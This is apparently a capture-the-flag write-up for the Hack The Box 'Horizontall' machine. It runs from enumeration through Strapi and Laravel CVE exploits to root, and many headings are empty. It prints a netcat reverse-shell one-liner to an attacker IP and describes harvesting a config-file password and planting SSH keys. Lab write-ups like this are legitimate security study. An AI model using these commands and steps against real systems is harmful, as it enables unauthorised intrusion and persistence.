Horizontall
Enumeration
Ports and Services
Software Installed:
- Strapi CMS 3.0.0-beta.17.4
- Laravel v8 (PHP v7.4.18)
Nmap Scan Results:
Gobuster:
VHosts:
Gobuster - api=prod.hroizontall.htb:
Nikto:
/admin/init I can get version:
Initial Foothold
Strapi CMS 3.0.0-beta.17.4 is vulnerable to both a password reset as well as remote code execution vulnerability
- CVE-2019-18818
- CVE-2019-19609
Exploit-db has a python script that resets the admin password as well as
allows for Remote Code to execute:
https://www.exploit-db.com/exploits/50239
Rev Shell:
Executed nc
CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 8888
/tmp/f
Found password in
/opt/strapi/myapi/config/environments/development/database.json
Created and upload ssh key for strapi user
User.txt Proof Screenshot
Privilege Escalation
Port 8000 is hosting Laravel Framework:
This version of Laravel is vulnerable to RCE
CVE-2021-3129
https://github.com/nth347/CVE-2021-3129_exploit
Copied SSH key from strapi to root:
SSH as root:
RootScreenshot Here: